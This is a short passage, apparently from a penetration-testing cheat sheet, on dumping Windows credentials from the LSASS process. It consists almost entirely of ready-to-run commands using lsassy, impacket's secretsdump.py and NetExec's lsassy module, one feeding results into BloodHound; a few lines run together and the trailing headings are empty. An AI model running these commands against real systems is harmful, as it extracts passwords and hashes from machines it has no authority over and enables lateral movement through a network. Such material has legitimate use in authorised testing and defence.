LSASS Process
Practical Exploitation:
# Lsassy script
lsassy -u <USER> -p <PASSWORD> <TARGETS>secretsdump.py <DOMAIN>/<USERNAME>:<PASSWORD>@<TARGET># Lsassy module
nxc smb <TARGETS> -u <USER> -p <PASSWORD> -M lsassy
nxc smb <TARGETS> -u <USER> -p <PASSWORD> -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=<NEO4J_PASSWORD>LSA Protection
References :
Last updated